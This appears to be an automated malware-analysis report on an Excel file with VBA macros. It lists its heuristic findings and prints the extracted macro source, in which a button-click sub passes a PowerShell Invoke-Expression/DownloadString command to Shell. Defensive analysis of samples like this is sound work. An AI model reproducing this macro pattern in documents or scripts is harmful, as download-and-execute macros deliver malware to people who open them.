MALICIOUS
140
Risk Score
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dbl = Shell(Program, vbNormalFocus) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Program = "powershell.exe Invoke-Expression(DownloadString DownloadFile ReadAllBytes)"
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 838 bytes |
SHA-256: aa0bdf27b89c7859bdc3c80115134e4d05090c81c539eff16f49919ebc53c4eb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Rectangle1_Click()
Dim Program As String
Dim Dbl As Double
Program = "powershell.exe Invoke-Expression(DownloadString DownloadFile ReadAllBytes)"
Dbl = Shell(Program, vbNormalFocus)
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 15360 bytes |
SHA-256: 95d7e1004432d72ea12e73e16f71ca0087e24e3325ae06295b0aa6d2476573b8 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.